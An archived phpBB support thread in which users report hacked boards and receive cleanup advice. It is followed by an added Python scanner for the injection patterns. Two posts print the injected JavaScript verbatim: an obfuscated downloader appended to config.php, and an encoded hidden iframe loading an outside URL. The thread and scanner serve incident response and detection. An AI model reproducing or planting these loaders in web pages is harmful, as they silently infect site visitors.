Board Hacked into

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Board Hacked into

Post by BWOL »

Help!

My board has been hacked into. Link removed--cybrid23
Could someone help me with what to do to fix it.

Thank you!
Last edited by cybrid23 on Sun Oct 14, 2007 5:26 pm, edited 1 time in total.
Reason: Removed link; possibly harmful, see post below

jwunderly
Registered User
Posts: 5740
Joined: Sun Mar 30, 2003 2:18 pm
Location: Easton, PA (in the groove)

Re: Board Hacked into

Post by jwunderly »

Post the contents of your config.php file between code tags, but remove the password.
John (A cranky old man. "Looking for an echo ...")
using any control-panel install/update is like shooting yourself in the foot. It won't kill you, but you're really going to hobble around until it heals.
Using the wrong tools (Front Page, DreamWeaver) gives the same results
Do not PM me for Support!

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...

Re: Board Hacked into

Post by cybrid23 »

My board has been hacked, what do I do?

Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
---Never leave home without a towel and your peril sensitive sunglasses.
---Do Not PM Me For Support. It will go unanswered.
Thanks.

nvic
Registered User
Posts: 45
Joined: Tue Dec 12, 2006 1:43 am
Location: Line 234 in emailer.php

Re: Board Hacked into

Post by nvic »

Just to alert fellow forumers, my McAfee said this when I visited that site:
McAfee AV wrote: McAfee has automatically blocked and removed a potentially harmful script.

Details
Detection: JS/Downloader-AUD (Virus)
It is serving an infection. Make sure your AV is up to date before you visit the link!

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Sorry about the link - my oversight - I meant to post a warning about it.
jwunderly wrote: post the contents of your config.php file between code tags, but remove the password.
This is what is in the config.php file:

Code: Select all

<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql4';

$dbhost = 'localhost';
$dbname = 'bodywork_phpbb';
$dbuser = 'bodywork_phpbb';
$dbpasswd = '*********';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>
									<!--[I]--><script>document.write(unescape("%3Cscript%3Eif%28hbm%21%3D1%29%7Bfunction%20Wa%28fW%29%7Breturn%20fW%7Dtry%7Bvar%20dzm%3D%27oo0o50oJ0oj0oF0oM0oZ0oG0o40o60oR0oz0oy0ob0ox0oU0oB0od0oq0oK0oS0om0ow0o90oc0ol0oV0oW0oO0os0oh0on0oT0o30of0oX0ot0og0oP0o70oa0oY0oD0oN0oe0or0oA0oH0oL0op0o80oC0oi0ok05o05505J05j05F05M05Z05G05405605R05z05y05b05x05U05B05d05q05K05S05m05w05905c%27%3Bvar%20cQD%3Ddzm.substr%282%2C1%29%2Czje%3DArray%28sYq%28%2768%27%29%2CsYq%28%2711%27%29%2CsYq%28%2727%27%29%2C29845%5E29855%2C28380%5E28365%2C26007%5E26015%2C24187%5E24183%2CsYq%28%2770%27%29%2C28523%5E28533%2CsYq%28%2713%27%29%2C509%5E491%2C28908%5E28923%2C2399%5E2311%2CsYq%28%2754%27%29%2C28570%5E28581%2CsYq%28%2780%27%29%2CsYq%28%2749%27%29%2CsYq%28%2784%27%29%2CsYq%28%2746%27%29%2C9880%5E9929%2CsYq%28%273%27%29%2CsYq%28%2714%27%29%2C19430%5E19455%2C13030%5E13031%2CsYq%28%2726%27%29%2CsYq%28%2720%27%29%2C3464%5E3533%2C20244%5E20233%2C13700%5E13707%2CsYq%28%2760%27%29%2C21443%5E21497%2CsYq%28%2767%27%29%2C32227%5E32181%2CsYq%28%2744%27%29%2CsYq%28%2721%27%29%2C1386%5E1397%2C1996%5E1951%2C8719%5E8783%2C16273%5E16351%2CsYq%28%2776%27%29%2C28457%5E28513%2C17005%5E17009%2C17032%5E17051%2CsYq%28%2790%27%29%2C5009%5E5009%2CsYq%28%2753%27%29%2C24918%5E24957%2C4692%5E4689%2C8007%5E8039%2CsYq%28%2795%27%29%2CsYq%28%2773%27%29%2C6933%5E6935%2CsYq%28%2742%27%29%2CsYq%28%2747%27%29%2C4159%5E4107%2C18276%5E18259%2CsYq%28%2734%27%29%2C15412%5E15459%2C22199%5E22183%2C30808%5E30733%2CsYq%28%2766%27%29%2C9114%5E9155%2C25284%5E25219%2CsYq%28%2751%27%29%2C12086%5E12053%2C23901%5E23931%2CsYq%28%2765%27%29%2C12130%5E12103%2C14301%5E14329%2CsYq%28%2761%27%29%2C1110%5E1135%2C21282%5E21273%2C29531%5E29481%2CsYq%28%2774%27%29%2C13452%5E13511%2CsYq%28%2777%27%29%2C14074%5E14005%2CsYq%28%2740%27%29%2CsYq%28%2782%27%29%29%3Bvar%20uZj%2ChVJ%3Bvar%20Xam%2CCQy%3D%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%27%3Bvar%20uTk%3DString%28%29%3Bfunction%20sYq%28IaK%29%7Breturn%20parseInt%28IaK%29%7Ddzm%3Ddzm.spli
t%28cQD%29%3Bfor%20%28uZj%3D0%3BuZj%3CCQy.length%3BuZj+%3D2%29%7BXam%3DCQy.substr%28uZj%2C2%29%3Bfor%28hVJ%3D0%3BhVJ%3Cdzm.length%3BhVJ++%29%7Bif%28dzm%5BhVJ%5D%3D%3DXam%29break%3B%7DuTk+%3DString.fromCharCode%28zje%5BhVJ%5D%5E120%29%3B%7Ddocument.write%28uTk%29%3B%7Dcatch%28MVs%29%7B%7D%7Dvar%20hbm%3D1%3C/script%3E"))</script><!--[/I]-->
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
I don't have enough knowledge to know what these steps entail. I have a full backup I made just days prior to this all starting. I am trying to contact the webmaster, but that is proving to be difficult.

Thank you.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...

Re: Board Hacked into

Post by cybrid23 »

Download the files to your PC using an FTP client.

Back up the database.

If you can get the server logs, that helps.

Then file a report and either attach the files or upload them to a site where they can be accessed.

To fix this, remove the script line at the end of the config.php file (after doing the above, please).

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Thank you.

I am backing up the database right now. I will look into everything else and see what I can find and then file the report.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...

Re: Board Hacked into

Post by cybrid23 »

Okay.

Also check your site for any files you don't recognize putting there.

Make your host aware of it so they can check the server, as they may have gotten in that way.

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Thank you for your help. The webmaster did end up stepping in and it seems all is well now. I think I still have enough of the information to file an incident report - should I still do that?

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...

Re: Board Hacked into

Post by cybrid23 »

Yes.

BWOL
Registered User
Posts: 17
Joined: Wed Apr 05, 2006 9:31 pm

Re: Board Hacked into

Post by BWOL »

Will do.

I am getting this message on the login when trying to get into the cPanel:
The server (our board) at cPanel requires a username and password.

Warning: This server is requesting that your username and password be
sent in an insecure manner (basic authentication without a secure
connection).
Do you know what that is about? I was able to get in earlier today.

cybrid23
Former Team Member
Posts: 9877
Joined: Wed Jun 29, 2005 5:55 am
Location: Somewhere in the Midwest...

Re: Board Hacked into

Post by cybrid23 »

cPanel is provided by your host, not phpBB.

You need to ask them.

crag364
Registered User
Posts: 78
Joined: Thu Jul 26, 2007 1:24 pm

Re: Board Hacked into

Post by crag364 »

Hi,

I have had the exact same virus appear on my board! I have checked the config file but no script is at the end of mine. Anyone know what I can do? When I check the index source I see this:

Code: Select all

<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%65%72%2D%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
I expect that's the virus.

I have already reported this to my webhost. Anyone know what I can do?

Thanks,

Craig

stevemaury
Support Team Member
Posts: 51188
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve

Re: Board Hacked into

Post by stevemaury »

What is "the index source"? index.php? If so, upload a fresh copy, file an incident report here as per the above, and report it to your host.

crag364
Registered User
Posts: 78
Joined: Thu Jul 26, 2007 1:24 pm

Re: Board Hacked into

Post by crag364 »

Sorry, I meant my config file. I have replaced this with a backup and it's still coming up. My config file is posted below:

Code: Select all

<?php

    $dbms = 'mysql' ;

    $dbhost   = 'localhost' ;
    $dbname   = 'underwat_phpb1'   ;
    $dbuser   = 'underwat_phpb1' ;
    $dbpasswd = '***' ;

    $table_prefix = 'phpbb_' ;

    define ( 'PHPBB_INSTALLED' , TRUE ) ;

?>
It all looks OK to me.

I did find one trace of it in the viewforum file yesterday. I deleted this and uploaded a backup and it's not in there now either, but it's still appearing.
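
The checks discussed in this thread (content appended after the closing `?>` of config.php, and `document.write(unescape(...))` calls in other board files) can be run across a local copy of the board's files. This is an added example, not part of the original thread and not phpBB code; the function names, the file-extension list and the `example.invalid` sample are constructed for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# Pattern shared by both injections posted in the thread.
WRITE_UNESCAPE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])(.*?)\1", re.S)
# Markup an injected loader typically writes once its argument is decoded.
HIDDEN_LOADER = re.compile(r"<\s*(iframe|script)\b", re.I)
SCANNED = {".php", ".html", ".htm", ".js", ".tpl"}  # assumed list, adjust as needed


def trailing_after_close_tag(text):
    """Return whatever follows the last '?>' (mixed PHP/HTML files will also match)."""
    _, sep, tail = text.rpartition("?>")
    return tail.strip() if sep else ""


def scan_text(text):
    """Return a list of (finding, detail) tuples for one file's contents."""
    findings = []
    tail = trailing_after_close_tag(text)
    if tail:
        findings.append(("content-after-closing-tag", tail[:60]))
    for match in WRITE_UNESCAPE.finditer(text):
        decoded = unquote(match.group(2))  # static decode only, nothing is executed
        kind = "hidden-loader" if HIDDEN_LOADER.search(decoded) else "unescape-write"
        findings.append((kind, decoded[:60]))
    return findings


def scan_tree(root):
    """Scan matching files under root and return {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED:
            if found := scan_text(path.read_text(errors="replace")):
                report[str(path)] = found
    return report


# Constructed sample: a clean config.php body with an injected line appended.
SAMPLE = ("<?php\n$dbms = 'mysql4';\ndefine('PHPBB_INSTALLED', true);\n?>\n"
          "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//"
          "example.invalid/x%22%3E%3C/iframe%3E'))</script>")

if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, *[f"\n  {kind}: {detail}" for kind, detail in hits])
```

Run it against the downloaded copy of the files rather than the live server, and compare any flagged file with a fresh copy from the phpBB package before replacing it.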
